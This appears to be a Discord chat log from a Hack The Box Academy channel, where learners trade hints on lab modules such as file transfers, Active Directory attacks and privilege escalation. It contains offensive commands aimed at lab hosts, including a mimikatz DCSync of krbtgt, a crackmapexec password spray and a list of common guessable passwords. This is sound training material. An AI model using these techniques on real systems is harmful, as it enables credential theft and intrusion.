Thanks but I tried that and no luck

or it could be share1

as dumb as that sounds

If it helps this is the error I get:

   on```

¯_(ツ)_/¯

also windows can be weird

do this on your kali:
smbclient -L -U "" 127.0.0.1 -p 8887

see if it'll list shares

how to start with coding or hacking?

smbclient is a tool specifically for interacting with SMB/CIFS servers, not WebDAV servers. WebDAV and SMB/CIFS are different protocols used for network file sharing.

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

¯_(ツ)_/¯

I got ```: Not enough '' characters in service

@acoustic owl can u help me out

use 4 \

In which module, which section?

\\\\ip\\

It's asking for the password for the workgroup of my vm. Its the HTB browser vm

just hit enter

Module: File Transfer

Trying SMB upload to share made by wsgidav
Command:
sudo wsgidav --host=0.0.0.0 --port=8887 --root=/tmp --auth=anonymous
I used:
my kali:
dir \\10.10.15.204:8887\
On windows box:
copy C:\Windows\System32\drivers\etc\hosts \\10.10.15.204:8887\
I think there is a problem with the share name. What is the share name for the share I created

if anonymous mode is on: just hit enter

Not enough \ characters in service

also it looks like wsgidav hosts a web service

so try navigating to https://127.0.0.1/8887/ ?

https://www.itweb.services/tutorials/linux-guides/deploying-webdav-on-debian-10-using-wsgidav/ < this is what i found on the internet

https://wsgidav.readthedocs.io/en/latest/

405 method not allowed

Thanks I will read through it

wsgidav is the fileserver being used to copy files via SMB to the host

it should be :8887 not / 8887 formatting did some dumb stuff

also try adding share1 at the end maybe?

Yeah it works

So since it is a web server then how do I upload files to it on the windows box. Different command?

you'd likely need to use invoke-webrequest

i'm rusty on my iwr stuff for windows but I think there's a section in File Transfers that has something like that

with you starting a python uploadserver

I tried using Invoke-FileUpload but it said network path problem

windows is weird with it's syntax at times

That's so true

hey guys using tmux i get alot of symbols ex  how would one prevent those or does one filter them out

if someone on skill assessment part 1 AD enumeration & attack can you confirm that MS01 is actually working , I got shell on it and can't run cmd ?

i wrote this for people stuck on that one. https://forum.hackthebox.com/t/active-directory-skills-assessment-i/257250/48 should help

😉

fun fact: u can use these tricks to do the "impossible ad" set of the oscp exam should u betaking the exam and misfortunate enough to roll that set.

Hey guys, I am in the YARA and Sigma for SOC Analysts module in the SOC Analyst path and I am stuck in the Skills Assessment question:

The "C:\Rules\yara\seatbelt.yar" YARA rule aims to detect instances of the "Seatbelt.exe" .NET assembly on disk. Analyze both "C:\Rules\yara\seatbelt.yar" and "C:\Samples\YARASigma\Seatbelt.exe" and specify the appropriate string inside the "$class2" variable so that the rule successfully identifies "C:\Samples\YARASigma\Seatbelt.exe". Answer format: L________r

I tried running .\Seatbelt.exe but no luck. Also tried analyzing it in the HxD dump but got nowhere. If anyone could give me a baseline on how to go about this would be greatly appreciated.

Okay thanks

have you tried running strings on it and looking for suspiciously named strings that could fit the answer format?

I haven’t. Let me try that! Thanks for the tip!

Im still curious what the 'impossible ad' set is because the whole exam was pretty easy to me. Feels like 'impossible ad' is just for people to cope harder about failing, but I cant say for sure since Ive got no way of knowing if my set was the supposed 'impossible set' or not.

it's the one with the disabled chisel

intentionally diasbled *

I dont use chisel so

¯_(ツ)_/¯

¯_(ツ)_/¯

oscp is not hard to take 🙂

or rather chisel is my plan B or if I need to specifically redirect to a local firewalled port

it really wasnt. Im just convinced most failures are unprepared

i think people fail it because they expect to be carried by the training which is just so uninspired

but if you just do stuff on computers u will pass

the training is god awful

skills-wise it's entry level

If I hadnt wanted to complete it specifically for my blog post to compare it to CPTS it would have been an utter waste of time lol

The “impossible ad set” wasn’t difficult at all

i know i used those tricks 🙂

would ligolo-ng have worked for the 'impossible ad' set? Because thats what I default used in my exam.

some people on reddit dont know though and they will complain about it not tunneling

Didn’t need that

it depends on if u get that set or not

I got the one they talked about on Reddit

the exam rotates boxes because cheaters

well i'm glad that you passed

So am I

Those people on Reddit made me extremely nervous lol

Can I be admin on htb pwnbox

yes, the creds should be on the desktop

No it's not there. But if you mean the Admin desktop, I cant access it

That is good to know. Is there a way to get admin on the windows box for the file transfer module? Because I can't transfer any files to the windows machine otherwise

Why do you need to have admin rights? You only need to store the file in a directory in which your user has write permissions

Which method can you use for this?

I ended up using ligolo , I found it the easiest way

I really don't know exactly what you want to do. But to save a file somewhere, your user must have write permissions.

Okay I am on the directory with write perms, but whats the method for file transfer

wget or iwr, and host a web server on your attack box

or host a smb server (smbserver.py (dont forget -smb2support)) on attack box so you can copy it directly from windows box

cf File Transfers module on academy

That's the module they're doing I think

im having a bit of a hard time with ssh (so simple but idk what im doing wrong). module is passwords attacks, pass the ticket from linux.

the question gives the credentials and port to ssh to. (ssh david@<target-ip> -p 2222) however when prompted for the password, "Password2", it comes back as incorrect.

which is why temp folder locations are so useful

preknown world writeable 👍

Hey. I started a python web server. Here's what happened:

t\Desktop\upload_win.zip```
``Invoke-WebRequest : Unable to connect to the remote server``

2 things: is the web server running on port 80

and 2 i don't think the python server runs on https

im dumb.. i just read the passsage lol i usually skip the passaage and try to do what I can before I read stuff..

reading the card explains the card

Good evening! I am doing the Pass the ticket part of passwords module. In Rubeus when I go to run the command that should give me access to the share I get a 1450 error, not enough system resources to complete the requested service

Could this just mean I did it wrong or?

If anyone knows it'd be much appreciated!

Edit: nevermind! Found it 🤠

I transfered the file. It was port 8000 not 80. But after using the has function on the file it says, I submit the hash and its the wrong answer. Not sure why

it seems to be stuck I am in skill assessment 2 for ad enumeration. I tried reseting the target there is no change...

am i doing it wrong?

What makes you think that’s the way to go

the task had weak password written in it so I thought might as well give it a try

I personally used cme

Netexec should work

netexec looks new I will look into that

It’s same as crackmapexec but better

what is the flag for domain in cme?

U don’t need it

At least I didn’t

oh ok

I made a valid user list by using the user we got from the other questions

I am looking into netexec documentation now

I used cme to generate the userlist

And then password spray on the user list on the .50 ip

You can use cme for this as well

oh kerbrute returned the result

crackmapexec smb 172.16.7.50 -u <userlist> -p <passtotry>

took a while

Nice, yeah it does take long

It’s a very big user list

well it worked with Welcome1 but what if I am in some other engagement how to determine the password to use

I used this cuz it was used before

it just involves some recon

Welcome1 is a fairly common onboarding password

Well you wouldn’t really know, except if you’d find like other default creds for them

like far more common than it should be

Like Inlanefreight2023

but you'd have to dig into stuff

That’s why I use Welcome01. People don’t expect that

big brain

Ive seen it on a customer device before lul

sommer and winter are also common

So I'm trying to do one of the questions in the AD enumeration & attacks module, specifically the section on ExtraSids attack. Question asks me to perform a Golden Ticket attack but I can't seem to get the NT hash for the child domains KRBTGT acount. This is the command I'm running and the error I'm getting:

mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt
[DC] 'LOGISTICS.INLANEFREIGHT.LOCAL' will be the domain
[DC] 'ACADEMY-EA-DC02.LOGISTICS.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'LOGISTICS\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)

Never mind this can be ignored, I got it to work

Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in this file?
I am stuck on this task in ad enumeration and attacks module can someone point me in some direction. I tried to log into the sql01 server but it did not work and both the users I found do not have replication rights. I tried as-rep but nothing returned during recon

I tried looking for it in MS01 BRxxx user too did not find anything

File containing a string

I tried to look for mssql conf files in hacktricks there was nothing there too

what am I missing

what kind of files might reasonably contain such a string? Review the section information

there is only this much info. I read the mssql section of attacking common services module too just to clear the base. I then performed a nmap scan on sql01 server

Yes thats the skill assessment page, Im talking about prior sections in the module.

Review your notes. if that doesnt reveal the clue reread the section information again

can you narrow the sections a little bit more please?

It's a skill assessment, use your brain

You got this far

found it

cme

nope wrong call

hi where do i start?

At the beginning

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

ty

I will go to sleep will pick it up in the morning its 6am now

good night guys

i made it to Q about julio and getting a file from \dc01\julio, I got past all that how I cant use cat or type against the flag.txt within smbclient

says the command isnt found... module Password attacks - pass the ticket linux... is there another command like those to read out the flag?

root@linux01:~# smbclient //dc01/julio -k -c cat julio.txt -no-pass
cat: command not found

cat isn't an smb command

mmm okay okay, good hint, let me dig. thanks

try just connecting, don't pass a command

also try putting -no-pass before the command flag

okay i was able to connect.. used help and i see available commands

gl

thank you

:)

sometimes taking a step back to basics helps :D

Update on this or for anyone else searching for help. A nudge is to REALLY pay attention to the question being asked. Something to be said for the KISS (Keep It Simple Stupid) method.. 🙃

yep

Hi all, I am on the medium lab for the footprinting module and was wondering how to delete the TechSupport share after unmounting. I keep getting permission denied even as root.

I cannot post screenshots for some reason

anyone in this room who interact at the same time with the HTB Forum, to ask something?

you need to link your account

you need to do sudo umount i believe, it's weird that it'd still show up after you say you unmounted

Maybe it will clear when I reboot the VM, I'm just being a little ocd right now

that's not OCD

hello there, anyone who can give me a hand with Module WinPrivEsc | Interacting with Users section, I'm trying to upload a CSF file, but can't find a writable drive into the shared folder, any hint..!!!

Stuck on WINDOWS PRIVILEGE ESCALATION: DnsAdmins
Question: Leverage membership in the DnsAdmins group to escalate privileges. Submit the contents of the flag located at c:\Users\Administrator\Desktop\DnsAdmins\flag.txt

Even after adding netadm to to Domain Admins group, why the reverse shell is not running I have done the following.
Any nudge will will helpful

Stuck for so long..!!

Also after adding netadm to Domain Admin group, is it suppose to view the file contents of Administrator through File Explorer ?

again, why are you running sh on windows, and your user is already DA, why bother sending a rev shell

I'm stuck on WinPrivEsc | Interacting with users, I can't find a writable shared folder, any hint?

@gizmoe380
Sorry for repeating the same mistake for that sh part. In hurry repeated the same mistake.

But yes that's what I was asking. When netadm is in domain Admin group why accessing file in Administrative Desktop show Access Denied?

relog

Mm ok
Let me try again

Anyone having issues getting into the Active Directory labs?

I am having issues getting a machine to spawn

I've tried changing VPNs and respawning three times for AD Skill Assessment 2.

I changed vpns, cleared cache, logged out and back in and still having issues

Thanks for confirming.

It's been hit or miss lately.

Also, it appears the targets disconnect at times even when the timer states 80 minutes on it

been waiting for target to spawn for the past 5 minutes

I have an enterprise account and its been over 20 minutes and my machine is still ""Deploying" how can i get this fixed?

is anyone having any connectivity problems right now?

Seems like we all are. Can't get the target to spawn

wowowow

im locked in rn. breaking my flow

Yes , came here msg the same

mine finally just came up. We'll see how long it lasts

mine too

Hello in Windows Attacks & Defense module in the section regarding “PKI-ESC1” I cant seem to connect to the PKI server. I cant even ping it. Can somebody help with this as far as how would I connect and check the event logs?

Targets are spawning

Hello in Windows Attacks & Defense module in the section regarding “PKI-ESC1” I cant seem to connect to the PKI server. I cant even ping it. Can somebody help with this as far as how would I connect and check the event logs?

Yeah, but they're spawning broken in my case

This is the given user:pass from the AD Skills Assessment 2

no route to host

oof

Any odd output from your openvpn connection, or are you using Pwnbox?

That error suggests you're not connected to the lab network

from a cursory glance it's either kali or pwnbox

just due to ssh being highlighted

that is kali

Hey Guys hope everyone great, need little bit of heads up here just paid for academy to start learning but my work suddenly became busy am only able to spend just an hour with the tutorial so frustrating, should I quit my job to stay focus and do anyone know any remote job or something I can do cause I got bills to pay !😂 just saying any advice would be appreciated.

I wouldn't advocate to quit a job unless you can comfortably afford to do so

tried to relog in and still this issue..!!
Reset the traget multiple times but don't know..!!

Did you relog or close and reopen the rdp session. There is a difference. Just closing the session without logging out leaves the user logged in.

Quit the rdp session..!!

Oo man..!!!

"Quit" how? Lol

wokred

Because that can mean a few different things

Lol nice

wokred..

Go to sleep. Or at least step away from the computer. Looks like you need a break

ah..!!

i hate windows from now on

Tbf wouldn't it be odd to turn your computer on (from a non-hibernated state) to a screen full of stuff you did last time?

I wish but i really need to finish the CPTS within the month..!!

got your point..!!

Thanks @fathom pendant

Good luck

But the more you push yourself the more mistakes you are inevitably gonna make

Taking breaks is healthy

The academy will still be there tomorrow

Looks like I really need this..!!

ooohhhkayy..!!!
Little break time..!

setting a hard time limit and forcing yourself to continue is not the way to go imo

Thank you for the advice.!!!
Through the rush I forgot few essentials of life..!!

Imo if you're trying to rush bc you forgot about your silver annual, I'd make sure you cancel the sub so it doesn't try and auto renew

does htb have a cube sale like steam does

for the summer or w/e

Not afaik

We do have discounts now and again

I am also trying to complete the Path till by the end of the month -> then one revision to consolidate my notes, then willl attempt Attacking Enterprise module blind and hopefully by March attempt exam currently at 72%

Best to keep an eye on our social channels 🙂

Can I dm you ?

Yes

do you have a family?

I just wouldn't say to quit until they find another job

Yeah but no kid and not playing kid

linkedIn, X , __ __
Can I have few more?

I think the team hit up Instagram too

https://www.instagram.com/hackthebox

I went through my notes I could not find anything related to a file having mssql string nor in the hacktricks I even got a shell for the sql01 server module need a hint please

Which module / section?

ad enumeration and attacks skill assessment 2

q6

can anyone give me a nudge on Network Enumeration with Nmap, Firewall and IDS/IPS Evasion - Medium Lab?

The tool was mentioned in one of the sections of the module

hi, can anyone give me a nudge please?

what u need help with?

may i dm?

why whats the question

can't figure out how to get the proper server version, i've been looking through the writeup at the beginning of the chapter, and been experimenting

should i be using --source-port 53 and target port 22?

do not look at writeups

i meant the

whats the module?

Network Enumeration with Nmap, Firewall and IDS/IPS Evasion - Medium Lab

to enumerate server version look into commonly used switches

hello guys can some 1 help me login it says that this account does not mach our records

login where?

I am still confused can you narrow it a bit more?

please

It was mentioned once in the beginning of the module (briefly)

and to get more info about it you need to go deep down into the rabbit hole

running module password attacks, protected files

im getting permission denied on ssh2john.py is that normal

Does the file have the executable bit set on it?